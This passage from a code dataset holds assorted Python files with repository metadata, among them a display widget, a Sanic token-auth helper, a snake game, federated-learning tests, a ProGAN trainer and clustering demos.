Will not change the outer bound size set by ``width`` and\n ``height``.\n \"\"\"\n LABEL_ALIGN_RIGHT = 2\n LABEL_ALIGN_CENTER = 1\n LABEL_ALIGN_LEFT = 0\n\n def __init__(\n self,\n x,\n y,\n width,\n height,\n corner_radius=10,\n text=\"Frame\",\n font=terminalio.FONT,\n outline=0xFFFFFF,\n text_color=None,\n background_color=0x0,\n stroke=2,\n top_label=True,\n label_align=LABEL_ALIGN_LEFT,\n ):\n super().__init__(x=x, y=y)\n\n roundrect = RoundRect(\n 0,\n 0,\n width,\n height,\n corner_radius,\n fill=None,\n outline=outline,\n stroke=stroke,\n )\n self.append(roundrect)\n\n if outline and not text_color:\n text_color = outline\n\n self.label = bitmap_label.Label(\n font,\n text=text,\n color=text_color,\n background_color=background_color,\n padding_left=2,\n padding_right=1,\n )\n\n self.label_align = label_align\n self.top_label = top_label\n\n if self.label.bounding_box[2] * 2 < width - (corner_radius * 2):\n self.label.scale = 2\n\n if top_label:\n _anchored_pos_y = 0\n else:\n _anchored_pos_y = height - 6\n\n if label_align == Frame.LABEL_ALIGN_CENTER:\n _anchor_x = 0.5\n _anchored_pos_x = width // 2\n elif label_align == Frame.LABEL_ALIGN_RIGHT:\n _anchor_x = 1.0\n _anchored_pos_x = width - corner_radius\n else: # label_align == Frame.LABEL_ALIGN_LEFT:\n _anchor_x = 0\n _anchored_pos_x = corner_radius\n\n self.label.anchor_point = (_anchor_x, 0.5)\n self.label.anchored_position = (_anchored_pos_x, _anchored_pos_y)\n self.append(self.label)\n","repo_name":"FoamyGuy/CircuitPython_Display_Frame","sub_path":"circuitpython_display_frame.py","file_name":"circuitpython_display_frame.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"26894805062","text":"from functools import wraps\n\nfrom sanic import Sanic, exceptions\n\n\nclass SanicTokenAuth:\n def __init__(self, app=None,\n header=None,\n token_verifier=None,\n secret_key=None\n ):\n self.secret_key = secret_key\n self.header = header\n self.token_verifier = token_verifier\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app: Sanic):\n \"\"\"hook on request start etc.\"\"\"\n app.register_middleware(self.open_session, 'request')\n\n async def open_session(self, request):\n pass\n\n async def _is_authenticated(self, request):\n token = request.headers.get(self.header, None) if self.header else request.token\n if self.token_verifier:\n return await self.token_verifier(token)\n return token == self.secret_key\n\n def auth_required(self, handler=None):\n @wraps(handler)\n async def wrapper(request, *args, **kwargs):\n if not await self._is_authenticated(request):\n raise exceptions.Unauthorized(\"Auth required.\")\n\n return await handler(request, *args, **kwargs)\n\n return wrapper\n","repo_name":"saabeilin/sanic-token-auth","sub_path":"src/sanic_token_auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"85"} +{"seq_id":"70590311319","text":"# -*- encoding: utf-8 -*-\nfrom django import forms\nfrom main.models import Anime\n\nclass UserForm(forms.Form):\n id = forms.CharField(label='User ID')\n \ndef get_lista(): \n valores = Anime.objects.values('generos').distinct()\n lista = []\n for v in valores:\n for v2 in v.values():\n v3 = v2.split(',')\n for v4 in v3:\n if v4 not in lista:\n lista.append(v4.lstrip().strip())\n res = []\n id = 0\n for x in set(lista):\n res.append((x, x))\n id += 1\n 
return res\n\nclass BusquedaPorGeneroForm(forms.Form):\n genero = forms.ChoiceField(label=\"Seleccione el genero\", choices=get_lista())","repo_name":"jesdomtri/AII","sub_path":"Sistemas de Recomendaciones/ej_SdR_3/main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19808398346","text":"import pygame, random, time, sys\n\n# Initializing the game\npygame.init()\nclock = pygame.time.Clock()\n\n# Declaring colours\norange = (255, 123, 7)\nblack = (0, 0, 0)\nred = (213, 50, 80)\ngreen = (0, 255, 0)\nblue = (50, 153, 213)\n\n# Display measurement\ndisplay_width = 900\ndisplay_height = 600\n\nGRIDSIZE = 25\nGRID_WIDTH = display_width / GRIDSIZE\nGRID_HEIGHT = display_height / GRIDSIZE\n\n# Setting up display & caption\ndis = pygame.display.set_mode((display_width, display_height))\npygame.display.set_caption(\"Snake game\")\n\nsnake_block = 15\nsnake_speed = 15\nsnake_list = []\n\nclass SNAKE(object):\n def __init__(self):\n self.positions = [((display_width / 2),\n (display_height / 2))]\n self.color = (0, 155, 155)\n def head_positions(self):\n return self.positions[0]\n\n def draw(self, surface):\n for p in self.positions:\n r = pygame.Rect((p[0], p[1]), (GRIDSIZE, GRIDSIZE))\n pygame.draw.rect(surface, self.color, r)\n pygame.draw.rect(surface, (0, 0, 0), r, 1)\n\n\n# Defining the snake's structure\n\n\nclass Food(object):\n def __init__(self):\n self.position = (0, 0)\n self.color = (255, 255, 255)\n self.randomize_position()\n\n def randomize_position(self):\n self.position = (random.randint(0, display_width - snake_block) / 10.0) * 10.0,\n (random.randint(0, display_width - snake_block) / 10.0) * 10.0\n\n\ndef main_snake_game():\n\n # Changes position\n x1_change = 0\n y1_change = 0\n\n snake_list = []\n lenth_of_snake = 1\n\n food_2 = Food()\n snake_2 = SNAKE()\n\n\n # Game Loop\n start = False\n end = False\n\n while not start:\n while end == True:\n dis.fill(blue)\n font_style = pygame.font.SysFont(\"Times New Roman\", 37)\n msg = font_style.render(\"You lost! Wanna try again? 
Press Space bar\", True, red)\n dis.blit(msg, [display_width / 6, display_height / 3])\n\n #Displaying the score\n score = lenth_of_snake - 1\n score_font = pygame.font.SysFont(\"Arial\", 35)\n value = score_font.render(f\"Your score: {str(score)}\", True, blue)\n dis.blit(value, [display_width / 3, display_height / 5])\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n main_snake_game()\n\n if event.type == pygame.QUIT:\n start = True\n end = False\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n start = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n x1_change = -snake_block\n y1_change = 0\n\n if event.key == pygame.K_RIGHT:\n x1_change = snake_block\n y1_change = 0\n\n if event.key == pygame.K_UP:\n y1_change = -snake_block\n x1_change = 0\n\n if event.key == pygame.K_DOWN:\n y1_change = snake_block\n x1_change = 0\n\n snake_head = []\n\n snake_head.append(snake_2.positions)\n snake_list.append(snake_head)\n\n # Ending the games the length of snake exceeds\n if len(snake_list) > lenth_of_snake:\n del snake_list[0]\n\n # When the snake hits itself, end the game\n for x in snake_list[:-1]:\n if x == snake_head:\n end = True\n\n\n pygame.display.update()\n\n # Increases the snake's size when it eats the food\n if snake_2.head_positions() == food_2.position:\n lenth_of_snake += 1\n score += 1\n food_2.randomize_position()\n\n clock.tick(snake_speed)\n\n pygame.quit()\n quit()\n\nmain_snake_game()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"koushikroy277/Snake_Game","sub_path":"snake_game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12391145493","text":"import collections\nfrom absl.testing import parameterized\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nfrom personalization_benchmark.cross_device.algorithms import finetuning_utils\n\n\ndef _create_dataset():\n \"\"\"Constructs an unbatched dataset with three datapoints.\"\"\"\n return tf.data.Dataset.from_tensor_slices({\n 'x': np.array([[-1.0, -1.0], [1.0, 1.0], [1.0, 1.0]], dtype=np.float32),\n 'y': np.array([[1.0], [1.0], [1.0]], dtype=np.float32)\n })\n\n\ndef _model_fn(num_layers: int = 1, initializer='zeros'):\n \"\"\"Constructs a simple multi-layer model initialized with zeros.\"\"\"\n input_dim = 2\n output_dim = 1\n inputs = tf.keras.Input(shape=(input_dim,))\n output = tf.keras.layers.Dense(\n output_dim, kernel_initializer=initializer)(\n inputs)\n for _ in range(num_layers - 1):\n output = tf.keras.layers.Dense(\n output_dim, kernel_initializer=initializer)(\n output)\n keras_model = tf.keras.Model(inputs=inputs, outputs=output)\n input_spec = collections.OrderedDict(\n x=tf.TensorSpec([None, input_dim], dtype=tf.float32),\n y=tf.TensorSpec([None, output_dim], dtype=tf.float32))\n return tff.learning.from_keras_model(\n keras_model=keras_model,\n input_spec=input_spec,\n loss=tf.keras.losses.MeanSquaredError(),\n metrics=[tf.keras.metrics.MeanAbsoluteError()])\n\n\nclass FinetuningUtilsTest(parameterized.TestCase, tf.test.TestCase):\n\n def test_evaluate_fn(self):\n eval_metrics = finetuning_utils.evaluate_fn(\n model=_model_fn(), dataset=_create_dataset())\n self.assertDictEqual(\n eval_metrics,\n collections.OrderedDict(\n # Evaluation uses batch size 1, so `num_batches` == `num_examples`.\n mean_absolute_error=1.0,\n 
loss=1.0,\n num_examples=3,\n num_batches=3))\n\n @parameterized.named_parameters(('finetune_last_layer', True),\n ('finetune_all_layers', False))\n def test_build_and_run_finetune_eval_fn(self, finetune_last_layer):\n finetune_eval_fn = finetuning_utils.build_finetune_eval_fn(\n optimizer_fn=lambda: tf.keras.optimizers.SGD(0.5),\n batch_size=2,\n num_finetuning_epochs=1,\n # The model has only 1 layer, so it does not matter whether we finetune\n # the last layer or all layers.\n finetune_last_layer=finetune_last_layer)\n finetuning_metrics = finetune_eval_fn(\n model=_model_fn(num_layers=1),\n train_data=_create_dataset(),\n test_data=_create_dataset())\n self.assertDictEqual(\n finetuning_metrics,\n # The model weights become [0, 0, 1] after training one epoch, so both\n # the `loss` and `MeanAbsoluteError` are 0. The batch size is 2 and the\n # number of examples is 3, so there are 2 batches.\n collections.OrderedDict(\n epoch_1=collections.OrderedDict(\n mean_absolute_error=0.0,\n loss=0.0,\n num_examples=3,\n num_batches=2),\n num_train_examples=3))\n\n def test_run_finetune_eval_fn_only_finetune_last_layer(self):\n finetune_eval_fn = finetuning_utils.build_finetune_eval_fn(\n optimizer_fn=lambda: tf.keras.optimizers.SGD(1.0),\n batch_size=2,\n num_finetuning_epochs=1,\n finetune_last_layer=True)\n model = _model_fn(num_layers=5, initializer='ones')\n initial_model_weights_tensors = tf.nest.map_structure(\n lambda var: var.numpy(), model.trainable_variables)\n finetune_eval_fn(\n model=model, train_data=_create_dataset(), test_data=_create_dataset())\n final_model_weights_tensors = tf.nest.map_structure(\n lambda var: var.numpy(), model.trainable_variables)\n # Assert that the final model weights have the same values as the initial\n # model weights for the first n-2 tensors, and different values for the last\n # 2 tensors (note the last layer has two tensors: kernal and bias).\n num_weight_tensors = len(initial_model_weights_tensors)\n for i in range(num_weight_tensors - 2):\n self.assertAllEqual(initial_model_weights_tensors[i],\n final_model_weights_tensors[i])\n for i in [num_weight_tensors - 2, num_weight_tensors - 1]:\n self.assertNotAllEqual(initial_model_weights_tensors[i],\n final_model_weights_tensors[i])\n\n def test_postprocess_finetuning_metrics(self):\n accuracy_name = 'accuracy'\n finetuning_fn_name = 'finetuning'\n baseline_metrics_name = finetuning_utils._BASELINE_METRICS\n num_examples_name = finetuning_utils._NUM_TEST_EXAMPLES\n num_finetune_examples_name = finetuning_utils._NUM_FINETUNE_EXAMPLES\n # Constructs a fake dictionary representing the finetuning eval metrics\n # collected from 2 validation clients (so each leaf is a list of size 2).\n valid_metrics_dict = collections.OrderedDict()\n valid_metrics_dict[baseline_metrics_name] = collections.OrderedDict([\n (accuracy_name, [0.1, 0.1]), (num_examples_name, [1, 3])\n ])\n valid_metrics_dict[finetuning_fn_name] = collections.OrderedDict()\n valid_metrics_dict[finetuning_fn_name]['epoch_1'] = collections.OrderedDict(\n [(accuracy_name, [0.0, 0.3]), (num_examples_name, [1, 3])])\n valid_metrics_dict[finetuning_fn_name][num_finetune_examples_name] = [1, 2]\n # Constructs a fake dictionary representing the finetuning eval metrics\n # collected from 2 test clients (so each leaf is a list of size 2).\n test_metrics_dict = collections.OrderedDict()\n test_metrics_dict[baseline_metrics_name] = collections.OrderedDict([\n (accuracy_name, [0.2, 0.2]), (num_examples_name, [2, 3])\n ])\n 
test_metrics_dict[finetuning_fn_name] = collections.OrderedDict()\n test_metrics_dict[finetuning_fn_name]['epoch_1'] = collections.OrderedDict([\n (accuracy_name, [0.1, 0.2]), (num_examples_name, [2, 3])\n ])\n test_metrics_dict[finetuning_fn_name][num_finetune_examples_name] = [2, 2]\n expected_processed_metrics = collections.OrderedDict()\n expected_processed_metrics[baseline_metrics_name] = collections.OrderedDict(\n valid_accuracy_mean=0.1, # mean([0.1, 0.1])\n test_accuracy_mean=0.2, # mean([0.2, 0.2])\n test_num_eval_examples_mean=2.5, # mean([2, 3])\n test_num_finetune_examples_mean=2) # mean([2, 2])\n expected_processed_metrics[finetuning_fn_name] = collections.OrderedDict(\n # The baseline average valid accuracy is 0.1. At Epoch 1, the mean\n # valid accuracy is mean([0.0, 0.3]) = 0.15, so the best epoch is 1.\n best_finetuning_epoch=1,\n valid_accuracy_at_best_epoch_mean=0.15, # mean([0.0, 0.3])\n test_accuracy_at_best_epoch_mean=0.15, # mean([0.1, 0.2])\n # The first test client's accuracy at Epoch 1 (0.1) is lower than\n # the baseline accuracy (0.2). The second test client's accuracy at\n # Epoch 1 (0.2) is equal to the baseline accuracy (0.2). Hence,\n # the fraction of clients hurt at Epoch 1 is 1/2 = 0.5.\n fraction_clients_hurt_at_best_epoch=0.5)\n expected_processed_metrics[finetuning_utils._RAW_METRICS_BEFORE_PROCESS] = (\n collections.OrderedDict(\n valid=valid_metrics_dict, test=test_metrics_dict))\n processed_metrics = finetuning_utils.postprocess_finetuning_metrics(\n valid_metrics_dict, test_metrics_dict, accuracy_name,\n finetuning_fn_name)\n tf.nest.map_structure(self.assertAllClose, processed_metrics,\n expected_processed_metrics)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"google-research/federated","sub_path":"personalization_benchmark/cross_device/algorithms/finetuning_utils_test.py","file_name":"finetuning_utils_test.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","stars":610,"dataset":"github-code","pt":"83"} +{"seq_id":"35588392935","text":"import datetime\r\n\r\n# Função para validar o ano de nascimento\r\ndef validar_ano(ano):\r\n try:\r\n ano = int(ano) # Tenta converter a entrada para um número inteiro\r\n if 1922 <= ano <= 2021: # Verifica se o ano está dentro do intervalo permitido\r\n return True, ano\r\n else:\r\n return False, None\r\n except ValueError:\r\n return False, None\r\n\r\n# Função para calcular a idade com base no ano de nascimento\r\ndef calcular_idade(ano_nascimento):\r\n ano_atual = datetime.date.today().year # Obtém o ano atual\r\n idade = ano_atual - ano_nascimento\r\n return idade\r\n\r\n# Solicita o nome completo do usuário\r\nnome_completo = input(\"Digite seu nome completo: \")\r\n\r\n# Loop para obter o ano de nascimento válido\r\nwhile True:\r\n ano_nascimento = input(\"Digite o ano de nascimento (1922-2021): \")\r\n valido, ano_nascimento = validar_ano(ano_nascimento)\r\n if valido:\r\n break\r\n else:\r\n print(\"Ano de nascimento inválido. 
Por favor, tente novamente.\")\r\n\r\nidade = calcular_idade(ano_nascimento)\r\n\r\nprint(f\"Nome: {nome_completo}\")\r\nprint(f\"Idade em 2022: {idade} anos\")","repo_name":"Caio2a7/Proz_Codigos","sub_path":"analise_de_datas.py","file_name":"analise_de_datas.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35562679225","text":"import textwrap\nfrom inspect import Parameter, signature\nfrom typing import Any, Callable, Optional, Sequence, Set, TypeVar, Union\n\nfrom typing_extensions import Concatenate, ParamSpec, TypeGuard\n\nR = TypeVar(\"R\")\nT = TypeVar(\"T\")\nP = ParamSpec(\"P\")\n\n\ndef get_valid_name_permutations(param_name: str) -> Set[str]:\n \"\"\"Get all underscore permutations for provided arg name.\"\"\"\n return {\n \"_\",\n param_name,\n f\"_{param_name}\",\n f\"{param_name}_\",\n }\n\n\ndef _is_param_valid(param: Parameter, expected_positional: str) -> bool:\n # The \"*\" character indicates that we permit any name for this positional parameter.\n if expected_positional == \"*\":\n return True\n\n possible_kinds = {Parameter.POSITIONAL_OR_KEYWORD, Parameter.POSITIONAL_ONLY}\n\n return (\n param.name in get_valid_name_permutations(expected_positional)\n and param.kind in possible_kinds\n )\n\n\ndef get_function_params(fn: Callable[..., Any]) -> Sequence[Parameter]:\n return list(signature(fn).parameters.values())\n\n\ndef validate_expected_params(\n params: Sequence[Parameter], expected_params: Sequence[str]\n) -> Optional[str]:\n \"\"\"Returns first missing positional, if any, otherwise None.\"\"\"\n expected_idx = 0\n for expected_param in expected_params:\n if expected_idx >= len(params) or not _is_param_valid(params[expected_idx], expected_param):\n return expected_param\n expected_idx += 1\n return None\n\n\ndef is_required_param(param: Parameter) -> bool:\n return param.default == Parameter.empty\n\n\ndef positional_arg_name_list(params: Sequence[Parameter]) -> Sequence[str]:\n accepted_param_types = {\n Parameter.POSITIONAL_OR_KEYWORD,\n Parameter.POSITIONAL_ONLY,\n }\n return [p.name for p in params if p.kind in accepted_param_types]\n\n\ndef param_is_var_keyword(param: Parameter) -> bool:\n return param.kind == Parameter.VAR_KEYWORD\n\n\ndef format_docstring_for_description(fn: Callable) -> Optional[str]:\n if fn.__doc__ is not None:\n docstring = fn.__doc__\n if len(docstring) > 0 and docstring[0].isspace():\n return textwrap.dedent(docstring).strip()\n else:\n first_newline_pos = docstring.find(\"\\n\")\n if first_newline_pos == -1:\n return docstring\n else:\n return (\n docstring[: first_newline_pos + 1]\n + textwrap.dedent(docstring[first_newline_pos + 1 :])\n ).strip()\n else:\n return None\n\n\n# Type-ignores are used throughout the codebase when this function returns False to ignore the type\n# error arising from assuming\n# When/if `StrictTypeGuard` is supported, we can drop `is_context_not_provided` since a False from\n# `has_at_least_one_parameter` will be sufficient.\ndef has_at_least_one_parameter(\n fn: Union[Callable[Concatenate[T, P], R], Callable[P, R]],\n) -> TypeGuard[Callable[Concatenate[T, P], R]]:\n return len(get_function_params(fn)) >= 1\n","repo_name":"alfredosa/dagster-meltano","sub_path":".venv/lib/python3.10/site-packages/dagster/_core/decorator_utils.py","file_name":"decorator_utils.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} 
+{"seq_id":"19481514817","text":"import requests\nimport json\n\nurl = \"https://jsonplaceholder.typicode.com/todos\"\n\nrequest_paylod = {\n \"userId\": 125485,\n \"id\": 222525,\n \"title\": \"Anil test\",\n \"completed\": 'true'\n }\n\nhead = {\n 'Content-Type' : 'application/Text',\n}\n\nhead = {\n 'Content-Type' : 'application/Json',\n}\n\n# Lessoon Learned : if we sent the different header type then system will respond with 500 error i.e. internal server error\nresponse = requests.post(url=url,data=request_paylod,headers=head)\nprint(response.status_code)","repo_name":"apalkumar/ForAzureDevopsDemo","sub_path":"postAPI.py","file_name":"postAPI.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28025605885","text":"#Matplotlib\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import style \r\n\r\n#style.use('ggplot')\r\n\r\nx = [5,6,7,8]\r\ny = [7,3,8,3]\r\n\r\nprint(len(x))\r\nprint(len(y))#Do these to tackel the error written in last comment\r\n\r\nplt.plot(x,y,'g', linewidth=5, label = 'Line One')\r\n\r\n#'g' sets it to green,linewidth changes the line width\r\n\r\nplt.title('Dumb Chart')\r\nplt.ylabel('Y-Axis')\r\nplt.xlabel('X-Axis')\r\nplt.legend()\r\n#Use legend after all the plotting is done.\r\n#We can change the position of the legend\r\nplt.grid(True, color = 'k')\r\n\r\nplt.show()\r\n\r\n#plt.show() brings up the graph\r\n#We need to reshow for updating, when using live feeds\r\n\r\n#If we have more x's than y's, then we will get a\r\n#value error saying x and y must have same first dimension\r\n\r\n\r\n","repo_name":"Calm-Rock/Learning_Python","sub_path":"43rdmatplotliblegends.py","file_name":"43rdmatplotliblegends.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37792414754","text":"# %%\nimport argparse\nfrom pathlib import Path\nimport sys\nsys.path.append(\"../\")\n\nfrom pro_gan.gan import ProGANTrainer\nfrom pro_gan.losses import StandardGAN, WganGP, LSGAN\n\nimport tensorflow as tf\ntf.config.run_functions_eagerly(True)\n\n# %%\ndef parse_arguments():\n \"\"\"\n command line arguments parser\n :return: args => parsed command line arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--save_dir\",\n action=\"store\",\n type=str,\n default=\"./test_train\",\n help=\"path to save the training logs and model checkpoints\",\n )\n\n parser.add_argument(\n \"--data_dir\",\n action=\"store\",\n type=str,\n default=\"/work/CELEBAHQ/train\",\n help=\"path to the training data\",\n required=True,\n )\n\n parser.add_argument(\n \"--latent_size\",\n action=\"store\",\n type=int,\n default=512,\n help=\"latent size for the generator\",\n )\n\n parser.add_argument(\n \"--depth\",\n action=\"store\",\n type=int,\n default=10,\n help=\"defines the resolution, 2 ** depth, of the generated images once training is done\",\n )\n\n parser.add_argument(\n \"--dis_learning_rate\",\n action=\"store\",\n type=float,\n default=0.001,\n help=\"discriminator training learning rate\",\n )\n\n parser.add_argument(\n \"--gen_learning_rate\",\n action=\"store\",\n type=float,\n default=0.001,\n help=\"generator training learning rate\",\n )\n\n parser.add_argument(\n \"--epochs\",\n action=\"store\",\n type=int,\n default=40,\n help=\"training epochs for each depth\",\n )\n\n parser.add_argument(\n \"--crop_size\",\n action=\"store\",\n type=int,\n 
default=None,\n help=\"crop training data to square images\",\n )\n\n parser.add_argument(\n \"--start_depth\",\n action=\"store\",\n type=int,\n default=2,\n help=\"start training from models with resolution 2 ** start_depth\",\n )\n\n parser.add_argument(\n \"--fade_in_percentage\",\n action=\"store\",\n type=int,\n default=50,\n help=\"percentage of epochs per resolution to use fade-in \\\n (for fading in the new layers; not used for 4 x 4 models, \\\n but a dummy value is still needed)\",\n )\n\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n batch_sizes = [256, 256, 128, 64, 16, 6, 3, 2, 1][:args.depth - 1]\n\n progan_trainer = ProGANTrainer(\n depth=args.depth,\n latent_size=args.latent_size,\n use_ema=False,\n save_dir=Path(args.save_dir),\n gen_learning_rate=args.gen_learning_rate,\n dis_learning_rate=args.dis_learning_rate,\n )\n\n with tf.device(\"/gpu:0\"):\n progan_trainer.train(\n data_dir=Path(args.data_dir),\n epochs=[args.epochs] * (args.depth - 1),\n fade_in_percentages=[args.fade_in_percentage] * (args.depth - 1),\n batch_sizes=batch_sizes,\n crop_size=args.crop_size,\n start_depth=args.start_depth,\n loss_fn=WganGP(),\n feedback_factor=20,\n checkpoint_factor=20,\n )\n\nif __name__ == \"__main__\":\n main(parse_arguments())\n\n\"\"\"\npython3 train_pro_gan.py --data_dir \"/work/CELEBAHQ/train\" --epochs 10\n\"\"\"\n","repo_name":"yueying-teng/pro_gan_tf2","sub_path":"notebooks/train_pro_gan.py","file_name":"train_pro_gan.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40225151148","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom machine_learning.clustering.k_means.lib.k_means import KMeans\nfrom machine_learning.clustering.hierarchical_clustering.agglomerative_clustering import AgglomerativeClustering\n \ndef generate_ball(x, radius, m): \n r = radius * np.random.rand(m)\n pi = 3.14\n theta = 2 * pi * np.random.rand(m)\n B = np.zeros((m,2))\n for i in range(m):\n B[i][0] = x[0] + r[i] * np.cos(theta[i])\n B[i][1] = x[1] + r[i] * np.sin(theta[i])\n return B\n\nB1 = generate_ball([0,0], 1, 100)\nB2 = generate_ball([0,2], 1, 100)\nB3 = generate_ball([5,1], 0.5, 10)\nX = np.concatenate((B1, B2, B3), axis=0)\n\nkmeans = KMeans(n_clusters = 2)\nkm_centers, km_assignments = np.array(kmeans.fit_transform(X))\n\nagg = AgglomerativeClustering(n_clusters = 2)\nagg_centers, agg_assignments = agg.fit_transform(X)\n\nplt.figure(7)\nplt.axis([-2, 6, -2, 4])\nplt.scatter(X[:,0], X[:,1], c='y')\n\nplt.figure(8)\nplt.axis([-2, 6, -2, 4])\nplt.scatter(X[:,0], X[:,1], c='y')\nplt.scatter(km_centers[:,0], km_centers[:,1], c='b', marker='*', s=300)\n\nplt.figure(9)\nplt.axis([-2, 6, -2, 4])\nplt.scatter(X[:,0], X[:,1], c='y')\nplt.scatter(agg_centers[:,0], agg_centers[:,1], c='b', marker='*', s=300)\nplt.show()\n\n\n\n\n\n \n \n\n\n\n\n\n\n \n \n \n\n\n\n\n\n\n\n\n\n\n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"246622/machine-learning","sub_path":"machine_learning-master/Codes/clustering/hierarchical_clustering/kmeans_vs_hierarchical.py","file_name":"kmeans_vs_hierarchical.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74238219150","text":"import sys\nimport os\n\n\n# frame rate that will be used for all wav files\nAUDIO_FRAME_RATE = 22050\n# number of pcm frames for fft window\nAUDIO_WINDOW_SIZE = 2048\n# extensions to 
look for inside the input directory\nVIDEO_EXT = ['avi', 'mkv', 'flv', 'wmv', 'mp4', 'm4v', 'mpeg', 'mpg']\n\n\n# place to store trash\nTMP_DIR = '/home/lelloman/PycharmProjects/python-introcutter/tmp'\n# since i'm using a common folder it's better to clean it\nCLEAN_TMP = True\n# hide ffmpeg command output from terminal\nVERBOSE = False\nSTD_OUT = sys.stdout if VERBOSE else open(os.devnull, 'w')\nSTD_ERR = sys.stderr if VERBOSE else open(os.devnull, 'w')\n\n# command to invoke ffmpeg\nFFMPEG = 'ffmpeg'\n# command to invoke ffprobe\nFFPROBE = 'ffprobe'\n\n\n# the path of the video to extract the intro\nINTRO_VIDEO_FILE = '/home/lelloman/Downloads/Futurama Season 1/Futurama [1x01] The Space Pilot 3000.avi'\n# starting position in seconds of the intro in the given video\nINTRO_START_S = 180\n# duration in seconds of the intro\nINTRO_DURATION_S = 27\n\n\n# all videos found here will be converted\nINPUT_DIR = '/home/lelloman/Downloads/Futurama Season 2 (copy)'\n# place to store all new videos without intro\nOUTPUT_DIR = '/home/lelloman/PycharmProjects/python-introcutter/output'\n# rename new files with this string + the old name\nOUTPUT_PREFIX = 'nointro_'\n\n","repo_name":"lelloman/python-introcutter","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73464366350","text":"import numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder \r\nfrom sklearn.model_selection import train_test_split \r\nfrom tensorflow.keras.models import Sequential \r\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\r\nimport matplotlib.pyplot as plt\r\nfrom var2 import gen_data\r\n\r\nx, y = gen_data(1000)\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train = x_train.reshape(x_train.shape[0], 50, 50, 1)\r\nx_test = x_test.reshape(x_test.shape[0], 50, 50, 1)\r\n\r\nencoder = LabelEncoder()\r\nencoder.fit(y_test)\r\ny_test = encoder.transform(y_test)\r\nencoder.fit(y_train)\r\ny_train = encoder.transform(y_train)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(50, 50, 1)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Conv2D(64, kernel_size=(3, 3), activation='relu', input_shape=(50, 50, 1)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Flatten())\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\n\r\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\r\nH = model.fit(x_train, y_train, epochs=10, batch_size=16, validation_split=0.1)\r\nmodel.evaluate(x_test, y_test)","repo_name":"Ksenox/ANN-2021","sub_path":"8383/Babenko/pr/6/pr6.py","file_name":"pr6.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33646263954","text":"from PIL import Image\nimport numpy as np\n\nclass ImageProcessor:\n\n def __init__(self):\n self.accepted_formats = ['.jpg', '.png']\n \n def validate_image_format(self, file):\n ext = f'.{file.filename.split(\".\")[-1]}'\n\n if not ext in self.accepted_formats:\n raise Exception(f'Invalid image format: \\'{ext}\\'. 
